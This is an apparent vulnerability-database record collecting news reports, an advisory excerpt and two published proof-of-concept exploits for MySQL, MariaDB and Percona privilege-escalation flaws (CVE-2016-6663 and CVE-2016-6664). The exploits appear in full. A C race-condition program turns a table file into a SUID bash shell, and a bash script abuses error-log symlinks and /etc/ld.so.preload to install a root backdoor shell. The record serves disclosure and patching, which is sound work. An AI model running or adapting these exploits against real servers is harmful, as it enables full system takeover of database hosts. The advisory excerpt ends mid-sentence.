the world's 2nd most popular database management software MySQL: \n\n\n * MySQL Remote Root Code Execution (CVE-2016-6662)\n * Privilege Escalation (CVE-2016-6663)\nAt that time, Polish security researcher **[Dawid Golunski](<https://twitter.com/dawid_golunski>) **of [Legal Hackers](<https://legalhackers.com/>) who discovered these vulnerabilities published technical details and [proof-of-concept exploit code](<https://thehackernews.com/2016/09/hack-mysql-database.html>) for the first bug only and promised to release details of the second bug (CVE-2016-6663) later. \n \nOn Tuesday, Golunski has released proof-of-concept (POC) exploits for two vulnerabilities: \n \nOne is the previously promised critical privilege escalation vulnerability ([CVE-2016-6663](<https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html>)), and another is a new root privilege escalation bug ([CVE-2016-6664](<https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html>)) that could allow an attacker to take full control over the database. \n \nBoth the vulnerabilities affect MySQL version 5.5.51 and earlier, MySQL version 5.6.32 and earlier, and MySQL version 5.7.14 and earlier, as well as MySQL forks \u2014 Percona Server and MariaDB. \n \n\n\n### Privilege Escalation/Race Condition Bug (CVE-2016-6663)\n\nThe more severe of the two is the race condition bug (CVE-2016-6663) that can allow a low-privileged account (with CREATE/INSERT/SELECT grants) with access to the affected database to escalate their privileges and execute arbitrary code as the database system user (i.e. 'mysql'). \n \nOnce exploited, an attacker could successfully gain access to all databases within the affected database server. \n \n\n\n### Root Privilege Escalation (CVE-2016-6664)\n\n \nAnother critical flaw in MySQL database is a root privilege escalation bug that could allow attackers with 'MySQL system user' privilege to further escalate their privileges to root user, allowing them to fully compromise the system. \n \nThe issue actually stems from unsafe file handling of error logs and other files, which comes under MySQL system user privileges, allowing it to be replaced with an arbitrary system file, which opens the door to root privileges. \n \nWhat's more troublesome? An attacker with a low-privileged account can also achieve root privilege by first exploiting the Privilege Escalation flaw (CVE-2016-6663) to become 'MySQL system user' and thus allow attackers to fully compromise the targeted server. \n \nAll these vulnerabilities could be exploited in shared hosting environments where users are assigned access to separate databases. By exploiting the flaws, they could gain access to all databases. \n \nGolunski has published the proof-of-concept exploit code ([Exploit 1](<https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html>), [Exploit 2](<https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html>)) for both the flaws and will soon [upload videos](<http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html>). \n \nMySQL has fixed the vulnerabilities and all of the patches ultimately found their way into Oracle's quarterly Critical Patch Update last month. \n \nAdministrators are strongly advised to [apply patches](<https://www.mysql.com/downloads/>) as soon as possible in order to avoid hackers seeking to exploit the vulnerabilities. \n \nIf you are unable to immediately apply patches, then as a temporary mitigation you can also disable symbolic link support within your database server configuration to this setting \u2014 **_my.cnf to symbolic-links = 0_** \u2014 in an attempt to protect yourself against cyber attacks.\n", "modified": "2016-11-06T16:44:59", "published": "2016-11-02T21:16:00", "id": "THN:527125445EE758FC7D6A33333D6500EB", "href": "https://thehackernews.com/2016/11/mysql-zero-day-exploits.html", "type": "thn", "title": "Critical Flaws in MySQL Give Hackers Root Access to Server (Exploits Released)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:36", "description": "\nMySQL MariaDB PerconaDB 5.5.x5.6.x5.7.x - mysql System User Privilege Escalation Race Condition", "edition": 1, "published": "2016-11-01T00:00:00", "title": "MySQL MariaDB PerconaDB 5.5.x5.6.x5.7.x - mysql System User Privilege Escalation Race Condition", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6663", "CVE-2016-6664", "CVE-2016-5616", "CVE-2016-6662"], "modified": "2016-11-01T00:00:00", "id": "EXPLOITPACK:55F22FE44A0D6F3F9005C334804B2317", "href": "", "sourceData": "/*\n\nSource: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html // http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c\n\nMySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\nmysql-privesc-race.c (ver. 1.0)\n\nCVE-2016-6663 / OCVE-2016-5616\n\nDiscovered/Coded by:\n\nDawid Golunski\ndawid[at]legalhackers.com\nhttps://legalhackers.com\n\nFollow https://twitter.com/dawid_golunski for updates on this advisory.\n\n\nCompile:\ngcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient\n\nNote:\n* On RedHat-based systems you might need to change /tmp to another public directory (e.g. /uploads)\n\n* For testing purposes only. Do no harm. \n\nFull advisory URL:\nhttps://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html\n\nVideo PoC:\nhttps://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html\n\n*/\n\n\n#include <fcntl.h>\n#include <grp.h>\n#include <mysql.h>\n#include <pwd.h>\n#include <stdint.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/inotify.h>\n#include <sys/stat.h>\n#include <sys/types.h>\n#include <sys/wait.h>\n#include <time.h>\n#include <unistd.h>\n\n\n#define EXP_PATH \"/tmp/mysql_privesc_exploit\"\n#define EXP_DIRN \"mysql_privesc_exploit\"\n#define MYSQL_TAB_FILE EXP_PATH \"/exploit_table.MYD\"\n#define MYSQL_TEMP_FILE EXP_PATH \"/exploit_table.TMD\"\n\n#define SUID_SHELL \t EXP_PATH \"/mysql_suid_shell.MYD\"\n\n#define MAX_DELAY 1000 // can be used in the race to adjust the timing if necessary\n\nMYSQL *conn;\t\t // DB handles\nMYSQL_RES *res;\nMYSQL_ROW row;\n\nunsigned long cnt;\n\n\nvoid intro() {\n\nprintf( \n \"\\033[94m\\n\"\n \"MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\\n\"\n \"mysql-privesc-race.c (ver. 1.0)\\n\\n\"\n \"CVE-2016-6663 / OCVE-2016-5616\\n\\n\"\n \"For testing purposes only. Do no harm.\\n\\n\"\n\t\"Discovered/Coded by:\\n\\n\"\n\t\"Dawid Golunski \\n\"\n\t\"http://legalhackers.com\"\n \"\\033[0m\\n\\n\");\n\n}\n\nvoid usage(char *argv0) {\n intro();\n printf(\"Usage:\\n\\n%s user pass db_host database\\n\\n\", argv0);\n}\n\nvoid mysql_cmd(char *sql_cmd, int silent) {\n \n if (!silent) {\n\t printf(\"%s \\n\", sql_cmd);\n }\n if (mysql_query(conn, sql_cmd)) {\n fprintf(stderr, \"%s\\n\", mysql_error(conn));\n exit(1);\n }\n res = mysql_store_result(conn);\n if (res>0) mysql_free_result(res);\n\n}\n\n\nint main(int argc,char **argv)\n{\n\n int randomnum = 0;\n int io_notified = 0;\n int myd_handle;\n int wpid;\n int is_shell_suid=0;\n pid_t pid;\n int status;\n struct stat st;\n /* io notify */\n int fd;\n int ret;\n char buf[4096] __attribute__((aligned(8)));\n int num_read;\n struct inotify_event *event;\n /* credentials */\n char *user = argv[1];\n char *password = argv[2];\n char *db_host = argv[3];\n char *database = argv[4];\n\n\n // Disable buffering of stdout\n setvbuf(stdout, NULL, _IONBF, 0);\n\n // Get the params\n if (argc!=5) {\n\tusage(argv[0]);\n\texit(1);\n } \n intro();\n // Show initial privileges\n printf(\"\\n[+] Starting the exploit as: \\n\");\n system(\"id\");\n\n // Connect to the database server with provided credentials\n printf(\"\\n[+] Connecting to the database `%s` as %s@%s\\n\", database, user, db_host);\n conn = mysql_init(NULL);\n if (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) {\n fprintf(stderr, \"%s\\n\", mysql_error(conn));\n exit(1);\n }\n\n // Prepare tmp dir\n printf(\"\\n[+] Creating exploit temp directory %s\\n\", \"/tmp/\" EXP_DIRN);\n umask(000);\n system(\"rm -rf /tmp/\" EXP_DIRN \" && mkdir /tmp/\" EXP_DIRN);\n system(\"chmod g+s /tmp/\" EXP_DIRN );\n\n // Prepare exploit tables :)\n printf(\"\\n[+] Creating mysql tables \\n\\n\");\n mysql_cmd(\"DROP TABLE IF EXISTS exploit_table\", 0);\n mysql_cmd(\"DROP TABLE IF EXISTS mysql_suid_shell\", 0);\n mysql_cmd(\"CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '\" EXP_PATH \"'\", 0);\n mysql_cmd(\"CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '\" EXP_PATH \"'\", 0);\n\n // Copy /bin/bash into the mysql_suid_shell.MYD mysql table file\n // The file should be owned by mysql:attacker thanks to the sticky bit on the table directory\n printf(\"\\n[+] Copying bash into the mysql_suid_shell table.\\n After the exploitation the following file/table will be assigned SUID and executable bits : \\n\");\n system(\"cp /bin/bash \" SUID_SHELL);\n system(\"ls -l \" SUID_SHELL);\n\n // Use inotify to get the timing right\n fd = inotify_init();\n if (fd < 0) {\n printf(\"failed to inotify_init\\n\");\n return -1;\n }\n ret = inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE);\n\n\n /* Race loop until the mysql_suid_shell.MYD table file gets assigned SUID+exec perms */\n\n printf(\"\\n[+] Entering the race loop... Hang in there...\\n\");\n\n while ( is_shell_suid != 1 ) {\n\n cnt++;\n\tif ( (cnt % 100) == 0 ) {\n\t \tprintf(\"->\");\n\t \t//fflush(stdout);\t\n\t}\n\n /* Create empty file , remove if already exists */\n unlink(MYSQL_TEMP_FILE);\n unlink(MYSQL_TAB_FILE);\n \tmysql_cmd(\"DROP TABLE IF EXISTS exploit_table\", 1);\n\tmysql_cmd(\"CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '\" EXP_PATH \"'\", 1);\n\n\t/* random num if needed */\n srand ( time(NULL) );\n randomnum = ( rand() % MAX_DELAY );\n\n // Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlink\n pid = fork();\n if (pid < 0) {\n fprintf(stderr, \"Fork failed :(\\n\");\n }\n\n /* Child process - executes REPAIR TABLE SQL statement */\n if (pid == 0) {\n usleep(500);\n unlink(MYSQL_TEMP_FILE);\n\t mysql_cmd(\"REPAIR TABLE exploit_table EXTENDED\", 1);\n // child stops here\n exit(0);\n }\n\n /* Parent process - aims to replace the temp .tmd table with a symlink before chmod */\n if (pid > 0 ) {\n io_notified = 0;\n\n while (1) {\n int processed = 0;\n ret = read(fd, buf, sizeof(buf));\n if (ret < 0) {\n break;\n }\n while (processed < ret) {\n event = (struct inotify_event *)(buf + processed);\n if (event->mask & IN_CLOSE) {\n if (!strcmp(event->name, \"exploit_table.TMD\")) {\n //usleep(randomnum);\n\n\t\t\t // Set the .MYD permissions to suid+exec before they get copied to the .TMD file \n\t\t\t unlink(MYSQL_TAB_FILE);\n\t\t\t myd_handle = open(MYSQL_TAB_FILE, O_CREAT, 0777);\n\t\t\t close(myd_handle);\n\t\t\t chmod(MYSQL_TAB_FILE, 04777);\n\n\t\t\t // Replace the temp .TMD file with a symlink to the target sh binary to get suid+exec\n unlink(MYSQL_TEMP_FILE);\n symlink(SUID_SHELL, MYSQL_TEMP_FILE);\n io_notified=1;\n }\n }\n processed += sizeof(struct inotify_event);\n }\n if (io_notified) {\n break;\n }\n }\n\n\n waitpid(pid, &status, 0);\n }\n\n\t// Check if SUID bit was set at the end of this attempt\n if ( lstat(SUID_SHELL, &st) == 0 ) {\n\t if (st.st_mode & S_ISUID) {\n\t\tis_shell_suid = 1;\n\t }\n } \n\n }\n\n printf(\"\\n\\n[+] \\033[94mBingo! Race won (took %lu tries) !\\033[0m Check out the \\033[94mmysql SUID shell\\033[0m: \\n\\n\", cnt);\n system(\"ls -l \" SUID_SHELL);\n\n printf(\"\\n[+] Spawning the \\033[94mmysql SUID shell\\033[0m now... \\n Remember that from there you can gain \\033[1;31mroot\\033[0m with vuln \\033[1;31mCVE-2016-6662\\033[0m or \\033[1;31mCVE-2016-6664\\033[0m :)\\n\\n\");\n system(SUID_SHELL \" -p -i \");\n //system(SUID_SHELL \" -p -c '/bin/bash -i -p'\");\n\n /* close MySQL connection and exit */\n printf(\"\\n[+] Job done. Exiting\\n\\n\");\n mysql_close(conn);\n return 0;\n\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:36", "description": "\nMySQL MariaDB PerconaDB 5.5.x5.6.x5.7.x - root System User Privilege Escalation", "edition": 1, "published": "2016-11-01T00:00:00", "title": "MySQL MariaDB PerconaDB 5.5.x5.6.x5.7.x - root System User Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6663", "CVE-2016-5617", "CVE-2016-6664", "CVE-2016-5616", "CVE-2016-6662"], "modified": "2016-11-01T00:00:00", "id": "EXPLOITPACK:3D8D46697DAADEA8249E37B2A2F09AE3", "href": "", "sourceData": "#!/bin/bash -p\n#\n# Source: https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html // http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh\n#\n# MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit\n# mysql-chowned.sh (ver. 1.0)\n#\n# CVE-2016-6664 / OCVE-2016-5617\n#\n# Discovered and coded by:\n#\n# Dawid Golunski\n# dawid[at]legalhackers.com\n#\n# https://legalhackers.com\n#\n# Follow https://twitter.com/dawid_golunski for updates on this advisory.\n#\n# This PoC exploit allows attackers to (instantly) escalate their privileges\n# from mysql system account to root through unsafe error log handling.\n# The exploit requires that file-based logging has been configured (default).\n# To confirm that syslog logging has not been enabled instead use:\n# grep -r syslog /etc/mysql\n# which should return no results.\n#\n# This exploit can be chained with the following vulnerability:\n# CVE-2016-6663 / OCVE-2016-5616\n# which allows attackers to gain access to mysql system account (mysql shell).\n#\n# In case database server has been configured with syslog you may also use:\n# CVE-2016-6662 as an alternative to this exploit.\n#\n# Usage:\n# ./mysql-chowned.sh path_to_error.log \n#\n#\n# See the full advisory for details at:\n# https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html\n#\n# Video PoC:\n# https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html\n#\n#\n# Disclaimer:\n# For testing purposes only. Do no harm.\n#\n\nBACKDOORSH=\"/bin/bash\"\nBACKDOORPATH=\"/tmp/mysqlrootsh\"\nPRIVESCLIB=\"/tmp/privesclib.so\"\nPRIVESCSRC=\"/tmp/privesclib.c\"\nSUIDBIN=\"/usr/bin/sudo\"\n\nfunction cleanexit {\n\t# Cleanup \n\techo -e \"\\n[+] Cleaning up...\"\n\trm -f $PRIVESCSRC\n\trm -f $PRIVESCLIB\n\trm -f $ERRORLOG\n\ttouch $ERRORLOG\n\tif [ -f /etc/ld.so.preload ]; then\n\t\techo -n > /etc/ld.so.preload\n\tfi\n\techo -e \"\\n[+] Job done. Exiting with code $1 \\n\"\n\texit $1\n}\n\nfunction ctrl_c() {\n echo -e \"\\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation.\"\n\tcleanexit 0\n}\n\n#intro \necho -e \"\\033[94m \\nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \\nmysql-chowned.sh (ver. 1.0)\\n\\nCVE-2016-6664 / OCVE-2016-5617\\n\"\necho -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttp://legalhackers.com \\033[0m\"\n\n# Args\nif [ $# -lt 1 ]; then\n\techo -e \"\\n[!] Exploit usage: \\n\\n$0 path_to_error.log \\n\"\n\techo -e \"It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\\n\"\n\texit 3\nfi\n\n# Priv check\n\necho -e \"\\n[+] Starting the exploit as \\n\\033[94m`id`\\033[0m\"\nid | grep -q mysql \nif [ $? -ne 0 ]; then\n\techo -e \"\\n[!] You need to execute the exploit as mysql user! Exiting.\\n\"\n\texit 3\nfi\n\n# Set target paths\nERRORLOG=\"$1\"\nif [ ! -f $ERRORLOG ]; then\n\techo -e \"\\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again.\\n\"\n\texit 3\nfi\necho -e \"\\n[+] Target MySQL log file set to $ERRORLOG\"\n\n# [ Active exploitation ]\n\ntrap ctrl_c INT\n# Compile privesc preload library\necho -e \"\\n[+] Compiling the privesc shared library ($PRIVESCSRC)\"\ncat <<_solibeof_>$PRIVESCSRC\n#define _GNU_SOURCE\n#include <stdio.h>\n#include <sys/stat.h>\n#include <unistd.h>\n#include <dlfcn.h>\n #include <sys/types.h>\n #include <sys/stat.h>\n #include <fcntl.h>\n\nuid_t geteuid(void) {\n\tstatic uid_t (*old_geteuid)();\n\told_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\n\tif ( old_geteuid() == 0 ) {\n\t\tchown(\"$BACKDOORPATH\", 0, 0);\n\t\tchmod(\"$BACKDOORPATH\", 04777);\n\t\t//unlink(\"/etc/ld.so.preload\");\n\t}\n\treturn old_geteuid();\n}\n_solibeof_\n/bin/bash -c \"gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\"\nif [ $? -ne 0 ]; then\n\techo -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\"\n\tcleanexit 2;\nfi\n\n\n# Prepare backdoor shell\ncp $BACKDOORSH $BACKDOORPATH\necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\n`ls -l $BACKDOORPATH`\"\n\n# Safety check\nif [ -f /etc/ld.so.preload ]; then\n\techo -e \"\\n[!] /etc/ld.so.preload already exists. Exiting for safety.\"\n\texit 2\nfi\n\n# Symlink the log file to /etc\nrm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG\nif [ $? -ne 0 ]; then\n\techo -e \"\\n[!] Couldn't remove the $ERRORLOG file or create a symlink.\"\n\tcleanexit 3\nfi\necho -e \"\\n[+] Symlink created at: \\n`ls -l $ERRORLOG`\"\n\n# Wait for MySQL to re-open the logs\necho -ne \"\\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\\n\"\nread -p \"Do you want to kill mysqld process to instantly get root? :) ? [y/n] \" THE_ANSWER\nif [ \"$THE_ANSWER\" = \"y\" ]; then\n\techo -e \"Got it. Executing 'killall mysqld' now...\"\n\tkillall mysqld\nfi\nwhile :; do \n\tsleep 0.1\n\tif [ -f /etc/ld.so.preload ]; then\n\t\techo $PRIVESCLIB > /etc/ld.so.preload\n\t\trm -f $ERRORLOG\n\t\tbreak;\n\tfi\ndone\n\n# /etc/\tdir should be owned by mysql user at this point\n# Inject the privesc.so shared library to escalate privileges\necho $PRIVESCLIB > /etc/ld.so.preload\necho -e \"\\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \\n`ls -l /etc/ld.so.preload`\"\necho -e \"\\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\"\necho -e \"\\n[+] The /etc/ld.so.preload file now contains: \\n`cat /etc/ld.so.preload`\"\nchmod 755 /etc/ld.so.preload\n\n# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)\necho -e \"\\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\"\nsudo 2>/dev/null >/dev/null\n\n#while :; do \n#\tsleep 0.1\n#\tps aux | grep mysqld | grep -q 'log-error'\n#\tif [ $? -eq 0 ]; then\n#\t\tbreak;\n#\tfi\n#done\n\n# Check for the rootshell\nls -l $BACKDOORPATH\nls -l $BACKDOORPATH | grep rws | grep -q root\nif [ $? -eq 0 ]; then \n\techo -e \"\\n[+] Rootshell got assigned root SUID perms at: \\n`ls -l $BACKDOORPATH`\"\n\techo -e \"\\n\\033[94mGot root! The database server has been ch-OWNED !\\033[0m\"\nelse\n\techo -e \"\\n[!] Failed to get root\"\n\tcleanexit 2\nfi\n\n\n# Execute the rootshell\necho -e \"\\n[+] Spawning the rootshell $BACKDOORPATH now! \\n\"\n$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\"\n$BACKDOORPATH -p\n\n# Job done.\ncleanexit 0", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:54:30", "bulletinFamily": "info", "cvelist": ["CVE-2016-5616", "CVE-2016-5617", "CVE-2016-6662", "CVE-2016-6663", "CVE-2016-6664"], "description": "Critical vulnerabilities in MySQL and vendor deployments by database servers MariaDB and PerconaDB have been identified that can lead to arbitrary code execution, root privilege escalation and server compromise.\n\n[Dawid Golunski](<https://twitter.com/dawid_golunski>) of [Legal Hackers](<https://legalhackers.com>) published details around two proof-of-concept exploits for the vulnerabilities on Tuesday.\n\nBoth vulnerabilities affect MySQL 5.5.51 and earlier, 5.6.32 and earlier, and 5.7.14 and earlier, along with MySQL database forks such as Percona Server and MariaDB.\n\nThe first vulnerability, [a privilege escalation/race condition](<https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html>) bug (CVE-2016-6663) is the more severe of the two. It can allow a local system user that has access to a database to escalate their privileges and execute arbitrary code as the database system user, Golunski said in an advisory. From there, an attacker could successfully access all of the databases on the affected database server.\n\nMore troubling, an attacker could chain the vulnerability together with a privilege escalation vulnerability, like the one Golunski uncovered in MySQL [back in September](<https://threatpost.com/critical-mysql-vulnerability-disclosed/120486/>), or the second, separate vulnerability he disclosed this week to further escalate privileges to the root system user. After doing so, an attacker could fully compromise the target server.\n\nGolunski warns the vulnerability could be exploited in a shared hosting environment where users are technically assigned to just one database, or by an attacker who could have gained access to a system as a lower tier user.\n\nThe second vulnerability uncovered by Golunski is [a root privilege escalation bug](<https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html>) that can be used in tandem with the race condition bug. Affected is MySQL and all current builds of MariaDB and select builds of Percona Server and Percona XtraDB Cluster.\n\nThe vulnerability is tied to the unsafe file handling of error logs and other files. Assuming an attacker has already gained MySQL system user access through the CVE-2016-6663 exploit they could further escalate their privileges on the system as root user. The error.log file is the crux of the problem here; because of the way it behaves, it performs unsafe file operations that can allow it to be removed and quickly replaced with an arbitrary system file, something that opens the door to root privileges.\n\nAccording to the researcher, combining this bug with the other privilege escalation bug would make things even messier.\n\n\u201cThe combination of the two would effectively allow low privileged local database users to escalate their system privileges to root system account and allow them to fully compromise the server which increases the severity of this issue,\u201d Golunski writes.\n\nGolunski told Threatpost on Wednesday that the vulnerabilities have been fixed by the database management systems for the most part. MySQL and Percona released patches for both issues after he privately disclosed the bugs to them.\n\nMariaDB is the lone holdout, at least for now. The database server project fixed first bug but has not patched the root privilege escalation vulnerability yet. According to Golunski, based on his interaction with the company, developers there were focused on fixing the Privilege Escalation/Race Condition vulnerability (CVE-2016-6663) first.\n\nWhen reached on Wednesday, a spokesperson from MariaDB said the database would fix the CVE-2016-6664 in a future release:\n\n> To clarify, CVE-2016-6664 requires another vulnerability in order to be exploitable. With CVE-2016-6663 fixed, there are no known exploitable vulnerabilities in MariaDB. We are planning to fix CVE-2016-6664 in an upcoming release, MariaDB said.\n\nGolunski first warned about CVE-2016-6663, undisclosed at the time, back in September when he divulged details around another issue, a remote root code execution and privilege escalation vulnerability ([CVE-2016-6662](<https://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html>)) in MySQL. MySQL ultimately fixed that bug quietly without informing Golunski. All of the fixes ultimately found their way into Oracle\u2019s quarterly Critical Patch Update \u2013 the most recent two coming under different CVE names (CVE-2016-5616, and CVE-2016-5617) \u2013 [last month](<https://threatpost.com/oracle-fixes-253-vulnerabilities-in-last-cpu-of-2016/121375/>).\n\nGolunski, who plans to publish [a video demonstrating](<https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html>) how an attacker could use the proof-of-concept exploit on all three database systems on Wednesday night, is encouraging users to update to the latest version regardless of what they use.\n", "modified": "2016-11-04T15:38:36", "published": "2016-11-02T14:02:10", "id": "THREATPOST:DA4DD61F50F0B749E360DA63CBE651AF", "href": "https://threatpost.com/critical-mysql-vulnerabilities-can-lead-to-server-compromise/121738/", "type": "threatpost", "title": "Critical MySQL Vulnerabilities Can Lead to Server Compromise", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:09", "description": "", "published": "2016-11-02T00:00:00", "type": "packetstorm", "title": "MySQL / MariaDB / PerconaDB Root Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6663", "CVE-2016-5617", "CVE-2016-6664", "CVE-2016-5616", "CVE-2016-6662"], "modified": "2016-11-02T00:00:00", "id": "PACKETSTORM:139491", "href": "https://packetstormsecurity.com/files/139491/MySQL-MariaDB-PerconaDB-Root-Privilege-Escalation.html", "sourceData": "`============================================= \n- Release date: 01.11.2016 \n- Discovered by: Dawid Golunski \n- Severity: High/Critical \n- CVE-2016-6664 / OCVE-2016-5617 \n- http://legalhackers.com \n============================================= \n \n \nI. VULNERABILITY \n------------------------- \n \nMySQL / MariaDB / PerconaDB - Root Privilege Escalation \n \nMySQL \n<= 5.5.51 \n<= 5.6.32 \n<= 5.7.14 \n \nMariaDB \nAll current \n \nPercona Server \n< 5.5.51-38.2 \n< 5.6.32-78-1 \n< 5.7.14-8 \n \nPercona XtraDB Cluster \n< 5.6.32-25.17 \n< 5.7.14-26.17 \n< 5.5.41-37.0 \n \n \nII. BACKGROUND \n------------------------- \n \nMySQL: \n \n\"MySQL is the world's most popular open source database. \nWhether you are a fast growing web property, technology ISV or large \nenterprise, MySQL can cost-effectively help you deliver high performance, \nscalable database applications.\" \n \n\"Many of the world's largest and fastest-growing organizations including \nFacebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time \nand money powering their high-volume Web sites, business-critical systems and \npackaged software.\" \n \nhttp://www.mysql.com/products/ \nhttp://www.mysql.com/why-mysql/ \n \n-- \n \nMariaDB: \n \n\"MariaDB is one of the most popular database servers in the world. \nItAAC/AC/aA!AC/aAC/s made by the original developers of MySQL and guaranteed to stay open source. \nNotable users include Wikipedia, WordPress.com and Google. \n \nMariaDB turns data into structured information in a wide array of applications, \nranging from banking to websites. It is an enhanced, drop-in replacement for MySQL. \nMariaDB is used because it is fast, scalable and robust, with a rich ecosystem of \nstorage engines, plugins and many other tools make it very versatile for a wide \nvariety of use cases.\" \n \nhttps://mariadb.org/about/ \n \n-- \n \nPerconaDB: \n \n\"Percona Server for MySQL is a free, fully compatible, enhanced, open source \ndrop-in replacement for MySQL that provides superior performance, scalability \nand instrumentation. \nWith over 3,000,000 downloads, Percona ServerAAC/AC/aA!AC/aAC/s self-tuning algorithms and support \nfor extremely high-performance hardware delivers excellent performance and reliability.\" \n \nhttps://www.percona.com/software/mysql-database/percona-server \n \n \nIII. INTRODUCTION \n------------------------- \n \nMySQL-based databases including MySQL, MariaDB and PerconaDB are affected \nby a privilege escalation vulnerability which can let attackers who have \ngained access to mysql system user to further escalate their privileges \nto root user allowing them to fully compromise the system. \nThe vulnerability stems from unsafe file handling of error logs and \nother files. \n \n \nIV. DESCRIPTION \n------------------------- \n \nThe error.log file on most default installations of MySQL/PerconaDB/MariaDB \ndatabases is stored either in /var/log/mysql or /var/lib/mysql directory. \n \nThe permissions on the file and directory look as follows: \n \nroot@trusty:/var/lib/mysql# ls -la /var/log/mysql \ntotal 468 \ndrwxr-s--- 2 mysql adm 4096 Sep 11 06:25 . \ndrwxrwxr-x 36 root syslog 4096 Sep 11 06:25 .. \n-rw-r----- 1 mysql adm 0 Sep 11 06:25 error.log \n \nroot@trusty:/var/lib/mysql# ls -lad /var/log/mysql \ndrwxr-s--- 2 mysql adm 4096 Sep 11 06:25 /var/log/mysql \n \n \nmysqld_safe wrapper that is normally used for starting MySQL daemon and \ncreating/reopening the error.log performs certain unsafe file operations that \nmay allow attackers to gain root privileges. \n \nThe wrapper script contains a 'while' loop shown below which monitors the mysqld \nprocess and performs a restart in case of the process failure. \nThe restart involves re-creation of the error.log file if syslog logging has \nnot been configured instead of error log files (file-based logging is the \ndefault setting on most installations). \n \n \n--------[ mysqld_safe ]-------- \n[...] \n \nwhile true \ndo \nrm -f \"$pid_file\" # Some extra safety \n \nstart_time=`date +%M%S` \n \neval_log_error \"$cmd\" \n \nif [ $want_syslog -eq 0 -a ! -f \"$err_log\" ]; then \ntouch \"$err_log\" # hypothetical: log was renamed but not \nchown $user \"$err_log\" # flushed yet. we'd recreate it with \nchmod \"$fmode\" \"$err_log\" # wrong owner next time we log, so set \nfi # it up correctly while we can! \n \n[...] \n \n------------------------------- \n \nAs can be seen, the error.log file is created (touch) and chowned to the user \nrunning the mysqld daemon (typically 'mysql'). \n \nThe operation is vulnerable to a symlink attack. \n \nAttackers who obtained access to mysql account, through CVE-2016-6663 \nvulnerability described at: \n \nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html \n \nwould gain access to /var/log or /var/lib/mysql directories (owned by mysql user) \nand could therefore easily remove the error.log file and replace it \nwith a symlink to an arbitrary system file and escalate privileges. \n \nThe 